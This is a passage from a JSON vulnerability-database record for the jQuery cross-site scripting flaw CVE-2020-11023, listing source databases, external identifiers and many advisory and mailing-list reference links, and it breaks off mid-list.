properties to be supplemented from connector configuration\nENTMQIC-2460 - Adding new config address, autolinks and link routes become slower as more get added\nENTMQIC-2481 - Unable to delete listener with http enabled\nENTMQIC-2485 - The VhostNamePatterns does not work in OCP env\nENTMQIC-2492 - router drops TransactionalState on produced messages on link routes\n\n7. 
Description:\n\nRed Hat OpenShift Service Mesh is Red Hat\u0027s distribution of the Istio\nservice mesh project, tailored for installation into an on-premise\nOpenShift Container Platform installation",
"sources": [
{
"db": "NVD",
"id": "CVE-2020-11023"
},
{
"db": "VULHUB",
"id": "VHN-163560"
},
{
"db": "PACKETSTORM",
"id": "159852"
},
{
"db": "PACKETSTORM",
"id": "171212"
},
{
"db": "PACKETSTORM",
"id": "171211"
},
{
"db": "PACKETSTORM",
"id": "170821"
},
{
"db": "PACKETSTORM",
"id": "170819"
},
{
"db": "PACKETSTORM",
"id": "170817"
},
{
"db": "PACKETSTORM",
"id": "168304"
},
{
"db": "PACKETSTORM",
"id": "158555"
},
{
"db": "PACKETSTORM",
"id": "159513"
},
{
"db": "PACKETSTORM",
"id": "158797"
}
],
"trust": 1.89
},
"external_ids": {
"_id": null,
"data": [
{
"db": "NVD",
"id": "CVE-2020-11023",
"trust": 2.1
},
{
"db": "PACKETSTORM",
"id": "162160",
"trust": 1.1
},
{
"db": "TENABLE",
"id": "TNS-2021-02",
"trust": 1.1
},
{
"db": "TENABLE",
"id": "TNS-2021-10",
"trust": 1.1
},
{
"db": "PACKETSTORM",
"id": "171212",
"trust": 0.2
},
{
"db": "PACKETSTORM",
"id": "159852",
"trust": 0.2
},
{
"db": "PACKETSTORM",
"id": "170821",
"trust": 0.2
},
{
"db": "PACKETSTORM",
"id": "158797",
"trust": 0.2
},
{
"db": "PACKETSTORM",
"id": "168304",
"trust": 0.2
},
{
"db": "PACKETSTORM",
"id": "170819",
"trust": 0.2
},
{
"db": "PACKETSTORM",
"id": "170817",
"trust": 0.2
},
{
"db": "PACKETSTORM",
"id": "159513",
"trust": 0.2
},
{
"db": "PACKETSTORM",
"id": "158555",
"trust": 0.2
},
{
"db": "PACKETSTORM",
"id": "171213",
"trust": 0.1
},
{
"db": "PACKETSTORM",
"id": "170823",
"trust": 0.1
},
{
"db": "PACKETSTORM",
"id": "162651",
"trust": 0.1
},
{
"db": "PACKETSTORM",
"id": "171214",
"trust": 0.1
},
{
"db": "PACKETSTORM",
"id": "160274",
"trust": 0.1
},
{
"db": "PACKETSTORM",
"id": "159275",
"trust": 0.1
},
{
"db": "PACKETSTORM",
"id": "161727",
"trust": 0.1
},
{
"db": "PACKETSTORM",
"id": "161830",
"trust": 0.1
},
{
"db": "PACKETSTORM",
"id": "160548",
"trust": 0.1
},
{
"db": "PACKETSTORM",
"id": "164887",
"trust": 0.1
},
{
"db": "PACKETSTORM",
"id": "158750",
"trust": 0.1
},
{
"db": "CNNVD",
"id": "CNNVD-202004-2420",
"trust": 0.1
},
{
"db": "VULHUB",
"id": "VHN-163560",
"trust": 0.1
},
{
"db": "PACKETSTORM",
"id": "171211",
"trust": 0.1
}
],
"sources": [
{
"db": "VULHUB",
"id": "VHN-163560"
},
{
"db": "PACKETSTORM",
"id": "159852"
},
{
"db": "PACKETSTORM",
"id": "171212"
},
{
"db": "PACKETSTORM",
"id": "171211"
},
{
"db": "PACKETSTORM",
"id": "170821"
},
{
"db": "PACKETSTORM",
"id": "170819"
},
{
"db": "PACKETSTORM",
"id": "170817"
},
{
"db": "PACKETSTORM",
"id": "168304"
},
{
"db": "PACKETSTORM",
"id": "158555"
},
{
"db": "PACKETSTORM",
"id": "159513"
},
{
"db": "PACKETSTORM",
"id": "158797"
},
{
"db": "NVD",
"id": "CVE-2020-11023"
}
]
},
"id": "VAR-202004-2199",
"iot": {
"_id": null,
"data": true,
"sources": [
{
"db": "VULHUB",
"id": "VHN-163560"
}
],
"trust": 0.01
},
"last_update_date": "2026-04-10T23:34:01.350000Z",
"problemtype_data": {
"_id": null,
"data": [
{
"problemtype": "CWE-79",
"trust": 1.1
}
],
"sources": [
{
"db": "VULHUB",
"id": "VHN-163560"
},
{
"db": "NVD",
"id": "CVE-2020-11023"
}
]
},
"references": {
"_id": null,
"data": [
{
"trust": 1.2,
"url": "https://security.gentoo.org/glsa/202007-03"
},
{
"trust": 1.1,
"url": "https://github.com/jquery/jquery/security/advisories/ghsa-jpcq-cgw6-v4j6"
},
{
"trust": 1.1,
"url": "https://security.netapp.com/advisory/ntap-20200511-0006/"
},
{
"trust": 1.1,
"url": "https://www.drupal.org/sa-core-2020-002"
},
{
"trust": 1.1,
"url": "https://www.tenable.com/security/tns-2021-02"
},
{
"trust": 1.1,
"url": "https://www.tenable.com/security/tns-2021-10"
},
{
"trust": 1.1,
"url": "https://www.debian.org/security/2020/dsa-4693"
},
{
"trust": 1.1,
"url": "http://packetstormsecurity.com/files/162160/jquery-1.0.3-cross-site-scripting.html"
},
{
"trust": 1.1,
"url": "https://blog.jquery.com/2020/04/10/jquery-3-5-0-released"
},
{
"trust": 1.1,
"url": "https://jquery.com/upgrade-guide/3.5/"
},
{
"trust": 1.1,
"url": "https://www.oracle.com//security-alerts/cpujul2021.html"
},
{
"trust": 1.1,
"url": "https://www.oracle.com/security-alerts/cpuapr2021.html"
},
{
"trust": 1.1,
"url": "https://www.oracle.com/security-alerts/cpuapr2022.html"
},
{
"trust": 1.1,
"url": "https://www.oracle.com/security-alerts/cpujan2021.html"
},
{
"trust": 1.1,
"url": "https://www.oracle.com/security-alerts/cpujan2022.html"
},
{
"trust": 1.1,
"url": "https://www.oracle.com/security-alerts/cpujul2020.html"
},
{
"trust": 1.1,
"url": "https://www.oracle.com/security-alerts/cpujul2022.html"
},
{
"trust": 1.1,
"url": "https://www.oracle.com/security-alerts/cpuoct2020.html"
},
{
"trust": 1.1,
"url": "https://www.oracle.com/security-alerts/cpuoct2021.html"
},
{
"trust": 1.1,
"url": "https://lists.debian.org/debian-lts-announce/2021/03/msg00033.html"
},
{
"trust": 1.1,
"url": "http://lists.opensuse.org/opensuse-security-announce/2020-07/msg00067.html"
},
{
"trust": 1.1,
"url": "http://lists.opensuse.org/opensuse-security-announce/2020-07/msg00085.html"
},
{
"trust": 1.1,
"url": "http://lists.opensuse.org/opensuse-security-announce/2020-11/msg00039.html"
},
{
"trust": 1.0,
"url": "https://nvd.nist.gov/vuln/detail/cve-2020-11023"
},
{
"trust": 1.0,
"url": "https://lists.apache.org/thread.html/r54565a8f025c7c4f305355fdfd75b68eca442eebdb5f31c2e7d977ae%40%3cissues.flink.apache.org%3e"
},
{
"trust": 1.0,
"url": "https://lists.apache.org/thread.html/r0483ba0072783c2e1bfea613984bfb3c86e73ba8879d780dc1cc7d36%40%3cissues.flink.apache.org%3e"
},
{
"trust": 1.0,
"url": "https://lists.apache.org/thread.html/ra3c9219fcb0b289e18e9ec5a5ebeaa5c17d6b79a201667675af6721c%40%3cgitbox.hive.apache.org%3e"
},
{
"trust": 1.0,
"url": "https://lists.apache.org/thread.html/r2c85121a47442036c7f8353a3724aa04f8ecdfda1819d311ba4f5330%40%3cdev.felix.apache.org%3e"
},
{
"trust": 1.0,
"url": "https://lists.fedoraproject.org/archives/list/package-announce%40lists.fedoraproject.org/message/sfp4uk4egp4afh2mwyj5a5z4i7xvfq6b/"
},
{
"trust": 1.0,
"url": "https://www.cisa.gov/known-exploited-vulnerabilities-catalog?field_cve=cve-2020-11023"
},
{
"trust": 1.0,
"url": "https://lists.apache.org/thread.html/r0593393ca1e97b1e7e098fe69d414d6bd0a467148e9138d07e86ebbb%40%3cissues.hive.apache.org%3e"
},
{
"trust": 1.0,
"url": "https://lists.apache.org/thread.html/rda99599896c3667f2cc9e9d34c7b6ef5d2bbed1f4801e1d75a2b0679%40%3ccommits.nifi.apache.org%3e"
},
{
"trust": 1.0,
"url": "https://lists.apache.org/thread.html/r564585d97bc069137e64f521e68ba490c7c9c5b342df5d73c49a0760%40%3cissues.flink.apache.org%3e"
},
{
"trust": 1.0,
"url": "https://lists.apache.org/thread.html/ra374bb0299b4aa3e04edde01ebc03ed6f90cf614dad40dd428ce8f72%40%3cgitbox.hive.apache.org%3e"
},
{
"trust": 1.0,
"url": "https://lists.apache.org/thread.html/r07ab379471fb15644bf7a92e4a98cbc7df3cf4e736abae0cc7625fe6%40%3cdev.felix.apache.org%3e"
},
{
"trust": 1.0,
"url": "https://lists.apache.org/thread.html/ra406b3adfcffcb5ce8707013bdb7c35e3ffc2776a8a99022f15274c6%40%3cissues.hive.apache.org%3e"
},
{
"trust": 1.0,
"url": "https://lists.apache.org/thread.html/ra32c7103ded9041c7c1cb8c12c8d125a6b2f3f3270e2937ef8417fac%40%3cgitbox.hive.apache.org%3e"
},
{
"trust": 1.0,
"url": "https://lists.apache.org/thread.html/radcb2aa874a79647789f3563fcbbceaf1045a029ee8806b59812a8ea%40%3cissues.hive.apache.org%3e"
},
{
"trust": 1.0,
"url": "https://lists.apache.org/thread.html/rf1ba79e564fe7efc56aef7c986106f1cf67a3427d08e997e088e7a93%40%3cgitbox.hive.apache.org%3e"
},
{
"trust": 1.0,
"url": "https://lists.apache.org/thread.html/rab82dd040f302018c85bd07d33f5604113573514895ada523c3401d9%40%3ccommits.hive.apache.org%3e"
},
{
"trust": 1.0,
"url": "https://lists.apache.org/thread.html/r3702ede0ff83a29ba3eb418f6f11c473d6e3736baba981a8dbd9c9ef%40%3cdev.felix.apache.org%3e"
},
{
"trust": 1.0,
"url": "https://lists.apache.org/thread.html/rbb448222ba62c430e21e13f940be4cb5cfc373cd3bce56b48c0ffa67%40%3cdev.flink.apache.org%3e"
},
{
"trust": 1.0,
"url": "https://lists.apache.org/thread.html/rd38b4185a797b324c8dd940d9213cf99fcdc2dbf1fc5a63ba7dee8c9%40%3cissues.hive.apache.org%3e"
},
{
"trust": 1.0,
"url": "https://lists.debian.org/debian-lts-announce/2023/08/msg00040.html"
},
{
"trust": 1.0,
"url": "https://lists.apache.org/thread.html/rb69b7d8217c1a6a2100247a5d06ce610836b31e3f5d73fc113ded8e7%40%3cissues.hive.apache.org%3e"
},
{
"trust": 1.0,
"url": "https://lists.apache.org/thread.html/re4ae96fa5c1a2fe71ccbb7b7ac1538bd0cb677be270a2bf6e2f8d108%40%3cissues.flink.apache.org%3e"
},
{
"trust": 1.0,
"url": "https://lists.fedoraproject.org/archives/list/package-announce%40lists.fedoraproject.org/message/qpn2l2xvqgua2v5hnqjwhk3apsk3vn7k/"
},
{
"trust": 1.0,
"url": "https://lists.apache.org/thread.html/r8f70b0f65d6bedf316ecd899371fd89e65333bc988f6326d2956735c%40%3cissues.flink.apache.org%3e"
},
{
"trust": 1.0,
"url": "https://lists.apache.org/thread.html/r4aadb98086ca72ed75391f54167522d91489a0d0ae25b12baa8fc7c5%40%3cissues.hive.apache.org%3e"
},
{
"trust": 1.0,
"url": "https://lists.apache.org/thread.html/r706cfbc098420f7113968cc377247ec3d1439bce42e679c11c609e2d%40%3cissues.flink.apache.org%3e"
},
{
"trust": 1.0,
"url": "https://lists.apache.org/thread.html/r1fed19c860a0d470f2a3eded12795772c8651ff583ef951ddac4918c%40%3cgitbox.hive.apache.org%3e"
},
{
"trust": 1.0,
"url": "https://lists.apache.org/thread.html/r6c4df3b33e625a44471009a172dabe6865faec8d8f21cac2303463b1%40%3cissues.hive.apache.org%3e"
},
{
"trust": 1.0,
"url": "https://lists.apache.org/thread.html/r9006ad2abf81d02a0ef2126bab5177987e59095b7194a487c4ea247c%40%3ccommits.felix.apache.org%3e"
},
{
"trust": 1.0,
"url": "https://lists.fedoraproject.org/archives/list/package-announce%40lists.fedoraproject.org/message/avkyxlwclzbv2n7m46kyk4lva5oxwpby/"
},
{
"trust": 1.0,
"url": "https://github.com/github/advisory-database/blob/99afa6fdeaf5d1d23e1021ff915a5e5dbc82c1f1/advisories/github-reviewed/2020/04/ghsa-jpcq-cgw6-v4j6/ghsa-jpcq-cgw6-v4j6.json#l20-l37"
},
{
"trust": 1.0,
"url": "https://lists.apache.org/thread.html/r6e97b37963926f6059ecc1e417721608723a807a76af41d4e9dbed49%40%3cissues.hive.apache.org%3e"
},
{
"trust": 1.0,
"url": "https://lists.fedoraproject.org/archives/list/package-announce%40lists.fedoraproject.org/message/sapqvx3xdnpgft26qaq6ajixzzbz4cd4/"
},
{
"trust": 1.0,
"url": "https://lists.apache.org/thread.html/rede9cfaa756e050a3d83045008f84a62802fc68c17f2b4eabeaae5e4%40%3cissues.flink.apache.org%3e"
},
{
"trust": 1.0,
"url": "https://lists.apache.org/thread.html/r9c5fda81e4bca8daee305b4c03283dddb383ab8428a151d4cb0b3b15%40%3cissues.hive.apache.org%3e"
},
{
"trust": 1.0,
"url": "https://lists.apache.org/thread.html/r55f5e066cc7301e3630ce90bbbf8d28c82212ae1f2d4871012141494%40%3cdev.felix.apache.org%3e"
},
{
"trust": 1.0,
"url": "https://lists.apache.org/thread.html/r4dba67be3239b34861f1b9cfdf9dfb3a90272585dcce374112ed6e16%40%3cdev.felix.apache.org%3e"
},
{
"trust": 1.0,
"url": "https://lists.apache.org/thread.html/r9e0bd31b7da9e7403478d22652b8760c946861f8ebd7bd750844898e%40%3cdev.felix.apache.org%3e"
},
{
"trust": 1.0,
"url": "https://lists.apache.org/thread.html/rb25c3bc7418ae75cba07988dafe1b6912f76a9dd7d94757878320d61%40%3cgitbox.hive.apache.org%3e"
},
{
"trust": 1.0,
"url": "https://lists.apache.org/thread.html/ree3bd8ddb23df5fa4e372d11c226830ea3650056b1059f3965b3fce2%40%3cissues.flink.apache.org%3e"
},
{
"trust": 1.0,
"url": "https://lists.apache.org/thread.html/rf0f8939596081d84be1ae6a91d6248b96a02d8388898c372ac807817%40%3cdev.felix.apache.org%3e"
},
{
"trust": 1.0,
"url": "https://lists.apache.org/thread.html/r49ce4243b4738dd763caeb27fa8ad6afb426ae3e8c011ff00b8b1f48%40%3cissues.flink.apache.org%3e"
},
{
"trust": 1.0,
"url": "https://lists.apache.org/thread.html/r094f435595582f6b5b24b66fedf80543aa8b1d57a3688fbcc21f06ec%40%3cissues.hive.apache.org%3e"
},
{
"trust": 1.0,
"url": "https://lists.apache.org/thread.html/rf661a90a15da8da5922ba6127b3f5f8194d4ebec8855d60a0dd13248%40%3cdev.hive.apache.org%3e"
},
{
"trust": 0.9,
"url": "https://access.redhat.com/security/cve/cve-2020-11023"
},
{
"trust": 0.9,
"url": "https://access.redhat.com/security/team/contact/"
},
{
"trust": 0.9,
"url": "https://nvd.nist.gov/vuln/detail/cve-2020-11022"
},
{
"trust": 0.9,
"url": "https://bugzilla.redhat.com/):"
},
{
"trust": 0.8,
"url": "https://access.redhat.com/articles/11258"
},
{
"trust": 0.8,
"url": "https://access.redhat.com/security/cve/cve-2020-11022"
},
{
"trust": 0.8,
"url": "https://access.redhat.com/security/team/key/"
},
{
"trust": 0.6,
"url": "https://access.redhat.com/security/cve/cve-2018-14042"
},
{
"trust": 0.6,
"url": "https://access.redhat.com/security/cve/cve-2018-14040"
},
{
"trust": 0.6,
"url": "https://nvd.nist.gov/vuln/detail/cve-2018-14042"
},
{
"trust": 0.6,
"url": "https://access.redhat.com/security/cve/cve-2019-11358"
},
{
"trust": 0.6,
"url": "https://nvd.nist.gov/vuln/detail/cve-2019-11358"
},
{
"trust": 0.6,
"url": "https://nvd.nist.gov/vuln/detail/cve-2018-14040"
},
{
"trust": 0.6,
"url": "https://listman.redhat.com/mailman/listinfo/rhsa-announce"
},
{
"trust": 0.6,
"url": "https://access.redhat.com/security/updates/classification/#important"
},
{
"trust": 0.5,
"url": "https://access.redhat.com/security/cve/cve-2022-40150"
},
{
"trust": 0.5,
"url": "https://access.redhat.com/security/cve/cve-2022-40149"
},
{
"trust": 0.5,
"url": "https://access.redhat.com/security/cve/cve-2022-45047"
},
{
"trust": 0.5,
"url": "https://access.redhat.com/security/cve/cve-2022-46364"
},
{
"trust": 0.5,
"url": "https://access.redhat.com/security/cve/cve-2022-42004"
},
{
"trust": 0.5,
"url": "https://access.redhat.com/security/cve/cve-2022-45693"
},
{
"trust": 0.5,
"url": "https://access.redhat.com/security/cve/cve-2022-42003"
},
{
"trust": 0.4,
"url": "https://access.redhat.com/security/cve/cve-2015-9251"
},
{
"trust": 0.4,
"url": "https://access.redhat.com/security/cve/cve-2019-8331"
},
{
"trust": 0.4,
"url": "https://nvd.nist.gov/vuln/detail/cve-2016-10735"
},
{
"trust": 0.4,
"url": "https://nvd.nist.gov/vuln/detail/cve-2015-9251"
},
{
"trust": 0.4,
"url": "https://access.redhat.com/security/cve/cve-2016-10735"
},
{
"trust": 0.4,
"url": "https://nvd.nist.gov/vuln/detail/cve-2019-8331"
},
{
"trust": 0.4,
"url": "https://issues.jboss.org/):"
},
{
"trust": 0.3,
"url": "https://www.redhat.com/mailman/listinfo/rhsa-announce"
},
{
"trust": 0.3,
"url": "https://access.redhat.com/security/updates/classification/#moderate"
},
{
"trust": 0.3,
"url": "https://nvd.nist.gov/vuln/detail/cve-2022-31129"
},
{
"trust": 0.3,
"url": "https://access.redhat.com/security/cve/cve-2022-31129"
},
{
"trust": 0.3,
"url": "https://nvd.nist.gov/vuln/detail/cve-2022-3143"
},
{
"trust": 0.3,
"url": "https://access.redhat.com/documentation/en-us/red_hat_jboss_enterprise_application_platform/7.4/"
},
{
"trust": 0.3,
"url": "https://access.redhat.com/documentation/en-us/red_hat_jboss_enterprise_application_platform/7.4/html-single/installation_guide/"
},
{
"trust": 0.3,
"url": "https://nvd.nist.gov/vuln/detail/cve-2018-14041"
},
{
"trust": 0.3,
"url": "https://nvd.nist.gov/vuln/detail/cve-2022-40150"
},
{
"trust": 0.3,
"url": "https://nvd.nist.gov/vuln/detail/cve-2017-18214"
},
{
"trust": 0.3,
"url": "https://nvd.nist.gov/vuln/detail/cve-2022-40152"
},
{
"trust": 0.3,
"url": "https://nvd.nist.gov/vuln/detail/cve-2022-40149"
},
{
"trust": 0.3,
"url": "https://access.redhat.com/security/cve/cve-2022-40152"
},
{
"trust": 0.3,
"url": "https://access.redhat.com/security/cve/cve-2018-14041"
},
{
"trust": 0.3,
"url": "https://access.redhat.com/security/cve/cve-2017-18214"
},
{
"trust": 0.3,
"url": "https://access.redhat.com/security/cve/cve-2022-3143"
},
{
"trust": 0.2,
"url": "https://access.redhat.com/security/cve/cve-2022-38750"
},
{
"trust": 0.2,
"url": "https://access.redhat.com/security/cve/cve-2022-1471"
},
{
"trust": 0.2,
"url": "https://nvd.nist.gov/vuln/detail/cve-2022-1438"
},
{
"trust": 0.2,
"url": "https://access.redhat.com/security/cve/cve-2022-3916"
},
{
"trust": 0.2,
"url": "https://access.redhat.com/security/cve/cve-2022-25857"
},
{
"trust": 0.2,
"url": "https://access.redhat.com/security/cve/cve-2022-46175"
},
{
"trust": 0.2,
"url": "https://nvd.nist.gov/vuln/detail/cve-2021-35065"
},
{
"trust": 0.2,
"url": "https://nvd.nist.gov/vuln/detail/cve-2021-44906"
},
{
"trust": 0.2,
"url": "https://access.redhat.com/security/cve/cve-2021-44906"
},
{
"trust": 0.2,
"url": "https://access.redhat.com/security/cve/cve-2023-0091"
},
{
"trust": 0.2,
"url": "https://access.redhat.com/security/cve/cve-2022-24785"
},
{
"trust": 0.2,
"url": "https://access.redhat.com/security/cve/cve-2022-3782"
},
{
"trust": 0.2,
"url": "https://access.redhat.com/security/cve/cve-2022-2764"
},
{
"trust": 0.2,
"url": "https://nvd.nist.gov/vuln/detail/cve-2022-2764"
},
{
"trust": 0.2,
"url": "https://access.redhat.com/security/cve/cve-2022-4137"
},
{
"trust": 0.2,
"url": "https://access.redhat.com/security/cve/cve-2022-46363"
},
{
"trust": 0.2,
"url": "https://nvd.nist.gov/vuln/detail/cve-2022-1471"
},
{
"trust": 0.2,
"url": "https://access.redhat.com/security/cve/cve-2023-0264"
},
{
"trust": 0.2,
"url": "https://access.redhat.com/security/cve/cve-2022-38751"
},
{
"trust": 0.2,
"url": "https://access.redhat.com/security/cve/cve-2022-1274"
},
{
"trust": 0.2,
"url": "https://access.redhat.com/security/cve/cve-2022-37603"
},
{
"trust": 0.2,
"url": "https://access.redhat.com/security/cve/cve-2022-38749"
},
{
"trust": 0.2,
"url": "https://access.redhat.com/security/cve/cve-2021-35065"
},
{
"trust": 0.2,
"url": "https://access.redhat.com/security/cve/cve-2022-1438"
},
{
"trust": 0.2,
"url": "https://nvd.nist.gov/vuln/detail/cve-2022-25857"
},
{
"trust": 0.2,
"url": "https://nvd.nist.gov/vuln/detail/cve-2022-24785"
},
{
"trust": 0.2,
"url": "https://nvd.nist.gov/vuln/detail/cve-2022-1274"
},
{
"trust": 0.1,
"url": "https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/avkyxlwclzbv2n7m46kyk4lva5oxwpby/"
},
{
"trust": 0.1,
"url": "https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/qpn2l2xvqgua2v5hnqjwhk3apsk3vn7k/"
},
{
"trust": 0.1,
"url": "https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/sfp4uk4egp4afh2mwyj5a5z4i7xvfq6b/"
},
{
"trust": 0.1,
"url": "https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/sapqvx3xdnpgft26qaq6ajixzzbz4cd4/"
},
{
"trust": 0.1,
"url": "https://lists.apache.org/thread.html/r9006ad2abf81d02a0ef2126bab5177987e59095b7194a487c4ea247c@%3ccommits.felix.apache.org%3e"
},
{
"trust": 0.1,
"url": "https://lists.apache.org/thread.html/r07ab379471fb15644bf7a92e4a98cbc7df3cf4e736abae0cc7625fe6@%3cdev.felix.apache.org%3e"
},
{
"trust": 0.1,
"url": "https://lists.apache.org/thread.html/r3702ede0ff83a29ba3eb418f6f11c473d6e3736baba981a8dbd9c9ef@%3cdev.felix.apache.org%3e"
},
{
"trust": 0.1,
"url": "https://lists.apache.org/thread.html/rf0f8939596081d84be1ae6a91d6248b96a02d8388898c372ac807817@%3cdev.felix.apache.org%3e"
},
{
"trust": 0.1,
"url": "https://lists.apache.org/thread.html/r9e0bd31b7da9e7403478d22652b8760c946861f8ebd7bd750844898e@%3cdev.felix.apache.org%3e"
},
{
"trust": 0.1,
"url": "https://lists.apache.org/thread.html/r2c85121a47442036c7f8353a3724aa04f8ecdfda1819d311ba4f5330@%3cdev.felix.apache.org%3e"
},
{
"trust": 0.1,
"url": "https://lists.apache.org/thread.html/r4dba67be3239b34861f1b9cfdf9dfb3a90272585dcce374112ed6e16@%3cdev.felix.apache.org%3e"
},
{
"trust": 0.1,
"url": "https://lists.apache.org/thread.html/r55f5e066cc7301e3630ce90bbbf8d28c82212ae1f2d4871012141494@%3cdev.felix.apache.org%3e"
},
{
"trust": 0.1,
"url": "https://lists.apache.org/thread.html/rbb448222ba62c430e21e13f940be4cb5cfc373cd3bce56b48c0ffa67@%3cdev.flink.apache.org%3e"
},
{
"trust": 0.1,
"url": "https://lists.apache.org/thread.html/r706cfbc098420f7113968cc377247ec3d1439bce42e679c11c609e2d@%3cissues.flink.apache.org%3e"
},
{
"trust": 0.1,
"url": "https://lists.apache.org/thread.html/r49ce4243b4738dd763caeb27fa8ad6afb426ae3e8c011ff00b8b1f48@%3cissues.flink.apache.org%3e"
},
{
"trust": 0.1,
"url": "https://lists.apache.org/thread.html/r564585d97bc069137e64f521e68ba490c7c9c5b342df5d73c49a0760@%3cissues.flink.apache.org%3e"
},
{
"trust": 0.1,
"url": "https://lists.apache.org/thread.html/r8f70b0f65d6bedf316ecd899371fd89e65333bc988f6326d2956735c@%3cissues.flink.apache.org%3e"
},
{
"trust": 0.1,
"url": "https://lists.apache.org/thread.html/rede9cfaa756e050a3d83045008f84a62802fc68c17f2b4eabeaae5e4@%3cissues.flink.apache.org%3e"
},
{
"trust": 0.1,
"url": "https://lists.apache.org/thread.html/ree3bd8ddb23df5fa4e372d11c226830ea3650056b1059f3965b3fce2@%3cissues.flink.apache.org%3e"
},
{
"trust": 0.1,
"url": "https://lists.apache.org/thread.html/r54565a8f025c7c4f305355fdfd75b68eca442eebdb5f31c2e7d977ae@%3cissues.flink.apache.org%3e"
},
{
"trust": 0.1,
"url": "https://lists.apache.org/thread.html/re4ae96fa5c1a2fe71ccbb7b7ac1538bd0cb677be270a2bf6e2f8d108@%3cissues.flink.apache.org%3e"
},
{
"trust": 0.1,
"url": "https://lists.apache.org/thread.html/r0483ba0072783c2e1bfea613984bfb3c86e73ba8879d780dc1cc7d36@%3cissues.flink.apache.org%3e"
},
{
"trust": 0.1,
"url": "https://lists.apache.org/thread.html/rab82dd040f302018c85bd07d33f5604113573514895ada523c3401d9@%3ccommits.hive.apache.org%3e"
},
{
"trust": 0.1,
"url": "https://lists.apache.org/thread.html/rf661a90a15da8da5922ba6127b3f5f8194d4ebec8855d60a0dd13248@%3cdev.hive.apache.org%3e"
},
{
"trust": 0.1,
"url": "https://lists.apache.org/thread.html/ra3c9219fcb0b289e18e9ec5a5ebeaa5c17d6b79a201667675af6721c@%3cgitbox.hive.apache.org%3e"
},
{
"trust": 0.1,
"url": "https://lists.apache.org/thread.html/ra374bb0299b4aa3e04edde01ebc03ed6f90cf614dad40dd428ce8f72@%3cgitbox.hive.apache.org%3e"
},
{
"trust": 0.1,
"url": "https://lists.apache.org/thread.html/rb25c3bc7418ae75cba07988dafe1b6912f76a9dd7d94757878320d61@%3cgitbox.hive.apache.org%3e"
},
{
"trust": 0.1,
"url": "https://lists.apache.org/thread.html/rf1ba79e564fe7efc56aef7c986106f1cf67a3427d08e997e088e7a93@%3cgitbox.hive.apache.org%3e"
},
{
"trust": 0.1,
"url": "https://lists.apache.org/thread.html/ra32c7103ded9041c7c1cb8c12c8d125a6b2f3f3270e2937ef8417fac@%3cgitbox.hive.apache.org%3e"
},
{
"trust": 0.1,
"url": "https://lists.apache.org/thread.html/r1fed19c860a0d470f2a3eded12795772c8651ff583ef951ddac4918c@%3cgitbox.hive.apache.org%3e"
},
{
"trust": 0.1,
"url": "https://lists.apache.org/thread.html/r094f435595582f6b5b24b66fedf80543aa8b1d57a3688fbcc21f06ec@%3cissues.hive.apache.org%3e"
},
{
"trust": 0.1,
"url": "https://lists.apache.org/thread.html/r9c5fda81e4bca8daee305b4c03283dddb383ab8428a151d4cb0b3b15@%3cissues.hive.apache.org%3e"
},
{
"trust": 0.1,
"url": "https://lists.apache.org/thread.html/r6e97b37963926f6059ecc1e417721608723a807a76af41d4e9dbed49@%3cissues.hive.apache.org%3e"
},
{
"trust": 0.1,
"url": "https://lists.apache.org/thread.html/rb69b7d8217c1a6a2100247a5d06ce610836b31e3f5d73fc113ded8e7@%3cissues.hive.apache.org%3e"
},
{
"trust": 0.1,
"url": "https://lists.apache.org/thread.html/rd38b4185a797b324c8dd940d9213cf99fcdc2dbf1fc5a63ba7dee8c9@%3cissues.hive.apache.org%3e"
},
{
"trust": 0.1,
"url": "https://lists.apache.org/thread.html/radcb2aa874a79647789f3563fcbbceaf1045a029ee8806b59812a8ea@%3cissues.hive.apache.org%3e"
},
{
"trust": 0.1,
"url": "https://lists.apache.org/thread.html/r4aadb98086ca72ed75391f54167522d91489a0d0ae25b12baa8fc7c5@%3cissues.hive.apache.org%3e"
},
{
"trust": 0.1,
"url": "https://lists.apache.org/thread.html/ra406b3adfcffcb5ce8707013bdb7c35e3ffc2776a8a99022f15274c6@%3cissues.hive.apache.org%3e"
},
{
"trust": 0.1,
"url": "https://lists.apache.org/thread.html/r0593393ca1e97b1e7e098fe69d414d6bd0a467148e9138d07e86ebbb@%3cissues.hive.apache.org%3e"
},
{
"trust": 0.1,
"url": "https://lists.apache.org/thread.html/r6c4df3b33e625a44471009a172dabe6865faec8d8f21cac2303463b1@%3cissues.hive.apache.org%3e"
},
{
"trust": 0.1,
"url": "https://lists.apache.org/thread.html/rda99599896c3667f2cc9e9d34c7b6ef5d2bbed1f4801e1d75a2b0679@%3ccommits.nifi.apache.org%3e"
},
{
"trust": 0.1,
"url": "https://access.redhat.com/documentation/en-us/red_hat_enterprise_linux/8/html/8.3_release_notes/"
},
{
"trust": 0.1,
"url": "https://nvd.nist.gov/vuln/detail/cve-2020-1721"
},
{
"trust": 0.1,
"url": "https://access.redhat.com/security/cve/cve-2019-10146"
},
{
"trust": 0.1,
"url": "https://nvd.nist.gov/vuln/detail/cve-2019-10221"
},
{
"trust": 0.1,
"url": "https://access.redhat.com/security/cve/cve-2020-1721"
},
{
"trust": 0.1,
"url": "https://nvd.nist.gov/vuln/detail/cve-2020-15720"
},
{
"trust": 0.1,
"url": "https://access.redhat.com/security/cve/cve-2020-15720"
},
{
"trust": 0.1,
"url": "https://nvd.nist.gov/vuln/detail/cve-2019-10146"
},
{
"trust": 0.1,
"url": "https://access.redhat.com/security/cve/cve-2019-10179"
},
{
"trust": 0.1,
"url": "https://nvd.nist.gov/vuln/detail/cve-2019-10179"
},
{
"trust": 0.1,
"url": "https://access.redhat.com/security/cve/cve-2019-10221"
},
{
"trust": 0.1,
"url": "https://access.redhat.com/errata/rhsa-2020:4847"
},
{
"trust": 0.1,
"url": "https://access.redhat.com/errata/rhsa-2023:1043"
},
{
"trust": 0.1,
"url": "https://access.redhat.com/errata/rhsa-2023:1044"
},
{
"trust": 0.1,
"url": "https://access.redhat.com/errata/rhsa-2023:0552"
},
{
"trust": 0.1,
"url": "https://access.redhat.com/errata/rhsa-2023:0554"
},
{
"trust": 0.1,
"url": "https://access.redhat.com/errata/rhsa-2023:0556"
},
{
"trust": 0.1,
"url": "https://access.redhat.com/jbossnetwork/restricted/listsoftware.html?downloadtype=securitypatches\u0026product=appplatform\u0026version=7.4"
},
{
"trust": 0.1,
"url": "https://nvd.nist.gov/vuln/detail/cve-2021-22096"
},
{
"trust": 0.1,
